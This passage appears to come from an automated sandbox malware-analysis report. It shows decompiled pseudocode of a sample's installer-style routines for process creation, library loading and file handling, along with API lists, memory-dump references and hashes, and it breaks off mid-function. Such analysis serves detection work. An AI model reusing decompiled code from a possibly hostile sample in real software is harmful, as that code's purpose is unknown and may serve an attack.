				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0x4000000, 0, 0, 0x448098,  &_v20); // executed
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                            0x004058f9
                                                            0x00405919
                                                            0x00405921
                                                            0x00405926
                                                            0x00000000
                                                            0x0040592c
                                                            0x00405930

                                                            APIs
                                                            • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00448098,00000009), ref: 00405919
                                                            • CloseHandle.KERNEL32(?), ref: 00405926
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CloseCreateHandleProcess
                                                            • String ID:
                                                            • API String ID: 3712363035-0
                                                            • Opcode ID: e1a7a9ac90590d15bdee2503b36fc35e0cb6cc366dcef6355b673084c93cbe07
                                                            • Instruction ID: c85fa0b22c9836a092614b3cfedc81871d8257a1e0135e40e7aa539d8c7996b4
                                                            • Opcode Fuzzy Hash: e1a7a9ac90590d15bdee2503b36fc35e0cb6cc366dcef6355b673084c93cbe07
                                                            • Instruction Fuzzy Hash: F6E0B6F4610209BFEB109B64ED4AF7F7BBCEB04704F114425BE59F2290DA7498189E78
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00406663 Relevance: 3.0, APIs: 2, Instructions: 22libraryloaderCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00406663(signed int _a4) {
				struct HINSTANCE__* _t5;
				signed int _t10;

				_t10 = _a4 << 3;
				_t8 =  *(_t10 + 0x40a240);
				_t5 = GetModuleHandleA( *(_t10 + 0x40a240));
				if(_t5 != 0) {
					L2:
					return GetProcAddress(_t5,  *(_t10 + 0x40a244));
				}
				_t5 = E004065F5(_t8); // executed
				if(_t5 == 0) {
					return 0;
				}
				goto L2;
			}





                                                            0x0040666b
                                                            0x0040666e
                                                            0x00406675
                                                            0x0040667d
                                                            0x00406689
                                                            0x00000000
                                                            0x00406690
                                                            0x00406680
                                                            0x00406687
                                                            0x00000000
                                                            0x00406698
                                                            0x00000000

                                                            APIs
                                                            • GetModuleHandleA.KERNEL32(?,00000000,?,004034F5,0000000B), ref: 00406675
                                                            • GetProcAddress.KERNEL32(00000000,?), ref: 00406690
                                                              • Part of subcall function 004065F5: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040660C
                                                              • Part of subcall function 004065F5: wsprintfA.USER32 ref: 00406645
                                                              • Part of subcall function 004065F5: LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 00406659
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                            • String ID:
                                                            • API String ID: 2547128583-0
                                                            • Opcode ID: b12ffe7be00a10b97de861747ec59dbd41b3c1b34775c1b4ed269191f8b45ceb
                                                            • Instruction ID: 42df78af1693d05b1f4151e300c7058424afa75421c13d02aa0b0909378b53c4
                                                            • Opcode Fuzzy Hash: b12ffe7be00a10b97de861747ec59dbd41b3c1b34775c1b4ed269191f8b45ceb
                                                            • Instruction Fuzzy Hash: 7FE086326042106BD3105B755E0493B73AC9E997103020D3EF94AF2140D7399C32966D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405DEA Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 68%
                                                            			E00405DEA(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}





                                                            0x00405dee
                                                            0x00405dfb
                                                            0x00405e10
                                                            0x00405e16

                                                            APIs
                                                            • GetFileAttributesA.KERNELBASE(00000003,00402F4C,00489000,80000000,00000003,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405DEE
                                                            • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405E10
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: File$AttributesCreate
                                                            • String ID:
                                                            • API String ID: 415043291-0
                                                            • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                            • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                            • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                            • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00405DC5 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00405DC5(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}





                                                            0x00405dca
                                                            0x00405dd0
                                                            0x00405dd5
                                                            0x00405dde
                                                            0x00405dde
                                                            0x00405de7

                                                            APIs
                                                            • GetFileAttributesA.KERNELBASE(?,?,004059DD,?,?,00000000,00405BC0,?,?,?,?), ref: 00405DCA
                                                            • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DDE
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: AttributesFile
                                                            • String ID:
                                                            • API String ID: 3188754299-0
                                                            • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                            • Instruction ID: 1444cfec4ca9bf1d34442b2169c12043b22736e773fd5239433e8f32ad8d098d
                                                            • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                            • Instruction Fuzzy Hash: 6FD0C972504421ABC6112728EE0C89BBB55DB54271702CA36FDA5A26B1DB304C569A98
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 004058BB Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E004058BB(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}




                                                            0x004058c1
                                                            0x004058c9
                                                            0x00000000
                                                            0x004058cf
                                                            0x00000000

                                                            APIs
                                                            • CreateDirectoryA.KERNELBASE(?,00000000,004033A6,00485000,00485000,00485000,00485000,00485000,00403690,?,00000007,00000009,0000000B), ref: 004058C1
                                                            • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058CF
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: CreateDirectoryErrorLast
                                                            • String ID:
                                                            • API String ID: 1375471231-0
                                                            • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                            • Instruction ID: 3fc85bafe69b7557593d5765bf5919c43deceba34b0c9ea4212deea00e127d8c
                                                            • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                            • Instruction Fuzzy Hash: 34C04C31214601EED6106B219E08B177BE5AB50741F25843E6646F00A0DE388469DA2D
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 73C22BC4 Relevance: 1.6, APIs: 1, Instructions: 143fileCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 22%
                                                            			E73C22BC4(intOrPtr _a4) {
				signed int _v8;
				void* __ebx;
				void* _t28;
				void* _t29;
				void* _t33;
				void* _t37;
				void* _t44;
				void* _t47;
				signed int _t53;
				void* _t58;
				intOrPtr _t64;
				intOrPtr _t67;
				signed int _t72;
				intOrPtr _t74;
				intOrPtr _t75;
				signed int _t78;
				void* _t80;
				void* _t81;
				void* _t82;
				void* _t83;
				intOrPtr _t86;
				intOrPtr _t87;

				if( *0x73c25024 != 0 && E73C21B3E(_a4) == 0) {
					 *0x73c25030 = _t86;
					if( *0x73c25034 != 0) {
						_t86 =  *0x73c25034;
					} else {
						E73C23100(E73C21BA7());
						 *0x73c25034 = _t86;
					}
				}
				_t28 = E73C21BAD(_a4);
				_t87 = _t86 + 4;
				if(_t28 <= 0) {
					L9:
					_t29 = E73C21B38();
					_t67 = _a4;
					_t74 =  *0x73c25028;
					 *((intOrPtr*)(_t29 + _t67)) = _t74;
					 *0x73c25028 = _t67;
					E73C21BBE();
					_t33 = CreateFileA(??, ??, ??, ??, ??, ??, ??); // executed
					 *0x73c25000 = _t33;
					 *0x73c25004 = _t74;
					if( *0x73c25024 != 0 && E73C21B3E( *0x73c25028) == 0) {
						 *0x73c25034 = _t87;
						_t87 =  *0x73c25030;
					}
					_t75 =  *0x73c25028;
					_a4 = _t75;
					 *0x73c25028 =  *((intOrPtr*)(E73C21B38() + _t75));
					_t37 = E73C21B2A(_t75);
					_pop(_t76);
					if(_t37 != 0) {
						_t37 = E73C21BAD(_t76);
						if(_t37 > 0) {
							_push(_t37);
							_push(E73C21BB8() + _a4 + _v8);
							_push(E73C21BC8());
							if( *0x73c25024 <= 0 || E73C21B3E(_a4) != 0) {
								_pop(_t81);
								_pop(_t44);
								if( *((intOrPtr*)(_t44 + _t81)) == 2) {
								}
								_pop(_t76);
								_t37 = _t44 + _v8;
								asm("loop 0xfffffff5");
							} else {
								_pop(_t82);
								_pop(_t47);
								_t78 =  *(_t47 + _t82);
								_t64 =  *0x73c25034;
								_t76 = _t64 + _t78 * 4;
								 *0x73c25034 = _t64 + _t78 * 4;
								_t37 = _t47 + _v8;
								asm("loop 0xffffffeb");
							}
						}
					}
					if( *0x73c25028 == 0) {
						 *0x73c25034 = 0;
					}
					_push( *0x73c25004);
					E73C22B72(_t37, _t64, _t76, _a4,  *0x73c25000);
					return _a4;
				}
				_push(E73C21BB8() + _a4);
				_t53 = E73C21BC4();
				_v8 = _t53;
				_t72 = _t28;
				_push(_t65 + _t53 * _t72);
				_t64 = E73C21C27();
				_t80 = E73C21C23();
				_t83 = E73C21BC8();
				_t58 = _t72;
				if( *((intOrPtr*)(_t58 + _t83)) == 2) {
					_push( *((intOrPtr*)(_t58 + _t64)));
				}
				_push( *((intOrPtr*)(_t58 + _t80)));
				asm("loop 0xfffffff1");
				goto L9;
			}

























                                                            0x73c22bd4
                                                            0x73c22be5
                                                            0x73c22bf2
                                                            0x73c22c06
                                                            0x73c22bf4
                                                            0x73c22bf9
                                                            0x73c22bfe
                                                            0x73c22bfe
                                                            0x73c22bf2
                                                            0x73c22c0f
                                                            0x73c22c14
                                                            0x73c22c1a
                                                            0x73c22c5e
                                                            0x73c22c5e
                                                            0x73c22c63
                                                            0x73c22c68
                                                            0x73c22c6e
                                                            0x73c22c70
                                                            0x73c22c76
                                                            0x73c22c83
                                                            0x73c22c85
                                                            0x73c22c8a
                                                            0x73c22c97
                                                            0x73c22caa
                                                            0x73c22cb0
                                                            0x73c22cb6
                                                            0x73c22cb7
                                                            0x73c22cbd
                                                            0x73c22cc9
                                                            0x73c22ccf
                                                            0x73c22cd7
                                                            0x73c22cd8
                                                            0x73c22cdb
                                                            0x73c22ce6
                                                            0x73c22ce8
                                                            0x73c22cf4
                                                            0x73c22cfa
                                                            0x73c22d02
                                                            0x73c22d2e
                                                            0x73c22d2f
                                                            0x73c22d35
                                                            0x73c22d35
                                                            0x73c22d38
                                                            0x73c22d39
                                                            0x73c22d3c
                                                            0x73c22d12
                                                            0x73c22d12
                                                            0x73c22d13
                                                            0x73c22d15
                                                            0x73c22d18
                                                            0x73c22d1e
                                                            0x73c22d21
                                                            0x73c22d27
                                                            0x73c22d2a
                                                            0x73c22d2a
                                                            0x73c22d02
                                                            0x73c22ce6
                                                            0x73c22d45
                                                            0x73c22d47
                                                            0x73c22d47
                                                            0x73c22d51
                                                            0x73c22d60
                                                            0x73c22d6e
                                                            0x73c22d6e
                                                            0x73c22c25
                                                            0x73c22c26
                                                            0x73c22c2b
                                                            0x73c22c2f
                                                            0x73c22c34
                                                            0x73c22c48
                                                            0x73c22c49
                                                            0x73c22c4a
                                                            0x73c22c4c
                                                            0x73c22c51
                                                            0x73c22c53
                                                            0x73c22c53
                                                            0x73c22c56
                                                            0x73c22c5c
                                                            0x00000000

                                                            APIs
                                                            • CreateFileA.KERNELBASE(?), ref: 73C22C83
                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1326511845.0000000073C21000.00000020.00000001.01000000.00000007.sdmp, Offset: 73C20000, based on PE: true
                                                            • Associated: 00000009.00000002.1326498896.0000000073C20000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.1326522491.0000000073C24000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            • Associated: 00000009.00000002.1326541140.0000000073C26000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_73c20000_file.jbxd
                                                            Similarity
                                                            • API ID: CreateFile
                                                            • String ID:
                                                            • API String ID: 823142352-0
                                                            • Opcode ID: e65fffba89169d0d0569e33a87830f938cc2f4224b472d100bc4b2f5a8c2f043
                                                            • Instruction ID: dd97bce0810672c09a54bb535b83c77cf31d308ef2fb7cabea798c522d789d52
                                                            • Opcode Fuzzy Hash: e65fffba89169d0d0569e33a87830f938cc2f4224b472d100bc4b2f5a8c2f043
                                                            • Instruction Fuzzy Hash: 304180F6900348EFEB00EF65DD84B5ABFB5EB14366F314429E608CE251DA35D954CB84
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402675 Relevance: 1.6, APIs: 1, Instructions: 76COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00402675(intOrPtr __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				intOrPtr _t27;
				intOrPtr _t33;
				void* _t38;
				void* _t41;

				_t33 = __edx;
				 *((intOrPtr*)(_t38 - 8)) = __ebx;
				_t27 = E00402C17(2);
				_t41 = _t27 - 1;
				 *((intOrPtr*)(_t38 - 0x38)) = _t33;
				 *((intOrPtr*)(_t38 - 0xc)) = _t27;
				if(_t41 < 0) {
					L24:
					 *0x4524a8 =  *0x4524a8 +  *(_t38 - 4);
				} else {
					__ecx = 0x1fff;
					if(__eax > 0x1fff) {
						 *((intOrPtr*)(__ebp - 0xc)) = 0x1fff;
					}
					if( *__esi == __bl) {
						L21:
						__esi =  *((intOrPtr*)(__ebp - 8));
						goto L22;
					} else {
						 *((char*)(__ebp + 0xb)) = __bl;
						 *(__ebp - 0x30) = E004061CE(__ecx, __esi);
						if( *((intOrPtr*)(__ebp - 0xc)) <= __ebx) {
							goto L21;
						} else {
							__esi =  *((intOrPtr*)(__ebp - 8));
							while(1) {
								__eax = __ebp - 0xd;
								__eax = E00405E62( *(__ebp - 0x30), __ebp - 0xd, 1); // executed
								if(__eax == 0) {
									break;
								}
								if( *((intOrPtr*)(__ebp - 0x1c)) != __ebx) {
									 *(__ebp - 0xd) & 0x000000ff = E004061B5(__edi,  *(__ebp - 0xd) & 0x000000ff);
								} else {
									if( *((char*)(__ebp + 0xb)) == 0xd ||  *((char*)(__ebp + 0xb)) == 0xa) {
										__al =  *(__ebp - 0xd);
										if( *((intOrPtr*)(__ebp + 0xb)) == __al || __al != 0xd && __al != 0xa) {
											__eax = SetFilePointer( *(__ebp - 0x30), 0xffffffff, __ebx, 1);
										} else {
											 *((char*)(__esi + __edi)) = __al;
											__esi = __esi + 1;
										}
										break;
									} else {
										__al =  *(__ebp - 0xd);
										 *((char*)(__esi + __edi)) = __al;
										__esi = __esi + 1;
										 *((char*)(__ebp + 0xb)) = __al;
										if(__al == __bl) {
											break;
										} else {
											if(__esi <  *((intOrPtr*)(__ebp - 0xc))) {
												continue;
											} else {
												break;
											}
										}
									}
								}
								goto L25;
							}
							L22:
							 *((char*)(__esi + __edi)) = __bl;
							if(_t41 == 0) {
								 *(_t38 - 4) = 1;
							}
							goto L24;
						}
					}
				}
				L25:
				return 0;
			}







                                                            0x00402675
                                                            0x00402677
                                                            0x0040267a
                                                            0x0040267f
                                                            0x00402683
                                                            0x00402686
                                                            0x00402689
                                                            0x00402ac5
                                                            0x00402ac8
                                                            0x0040268f
                                                            0x0040268f
                                                            0x00402696
                                                            0x00402698
                                                            0x00402698
                                                            0x0040269d
                                                            0x00402725
                                                            0x00402725
                                                            0x00000000
                                                            0x004026a3
                                                            0x004026a4
                                                            0x004026af
                                                            0x004026b2
                                                            0x00000000
                                                            0x004026b4
                                                            0x004026b4
                                                            0x004026b7
                                                            0x004026b7
                                                            0x004026c0
                                                            0x004026c7
                                                            0x00000000
                                                            0x00000000
                                                            0x004026cc
                                                            0x004026f5
                                                            0x004026ce
                                                            0x004026d2
                                                            0x004026ff
                                                            0x00402705
                                                            0x0040271d
                                                            0x0040270f
                                                            0x0040270f
                                                            0x00402712
                                                            0x00402712
                                                            0x00000000
                                                            0x004026da
                                                            0x004026da
                                                            0x004026dd
                                                            0x004026e0
                                                            0x004026e3
                                                            0x004026e6
                                                            0x00000000
                                                            0x004026e8
                                                            0x004026eb
                                                            0x00000000
                                                            0x004026ed
                                                            0x00000000
                                                            0x004026ed
                                                            0x004026eb
                                                            0x004026e6
                                                            0x004026d2
                                                            0x00000000
                                                            0x004026cc
                                                            0x00402728
                                                            0x00402728
                                                            0x004015b0
                                                            0x004027c8
                                                            0x004027c8
                                                            0x00000000
                                                            0x004015b0
                                                            0x004026b2
                                                            0x0040269d
                                                            0x00402ace
                                                            0x00402ad4

                                                            Memory Dump Source
                                                            • Source File: 00000009.00000002.1283222796.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                            • Associated: 00000009.00000002.1283213930.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283260638.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000040C000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000410000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000414000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000438000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.0000000000448000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000045B000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.000000000047F000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004BB000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283288153.00000000004F1000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000009.00000002.1283521705.00000000004F7000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_9_2_400000_file.jbxd
                                                            Similarity
                                                            • API ID: wsprintf
                                                            • String ID:
                                                            • API String ID: 2111968516-0
                                                            • Opcode ID: d97f9e7506a49f2a05a921778084f7980db9dc2b953e44158ed944f486982c36
                                                            • Instruction ID: 782d261d89be0bc1b18a11b4e535025141ccc8d289159bbcedea1472c154a4d0
                                                            • Opcode Fuzzy Hash: d97f9e7506a49f2a05a921778084f7980db9dc2b953e44158ed944f486982c36
                                                            • Instruction Fuzzy Hash: 2321F730C04289BEDF328F9886485AEBBB49F45314F14447FE491B73D2D6BD8985CB2A
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00402733 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 40%
                                                            			E00402733(intOrPtr __edx, void* __eflags) {
				long _t7;
				long _t9;
				LONG* _t11;
				void* _t13;
				intOrPtr _t14;
				void* _t17;
				void* _t19;

				_t14 = __edx;
				_push(ds);
				if(__eflags != 0) {
					_t7 = E00402C17(2);
					_pop(_t13);
					 *((intOrPtr*)(_t19 - 0x38)) = _t14;
					_t9 = SetFilePointer(E004061CE(_t13, _t17), _t7, _t11,  *(_t19 - 0x1c)); // executed
					if( *((intOrPtr*)(_t19 - 0x24)) >= _t11) {
						_push(_t9);
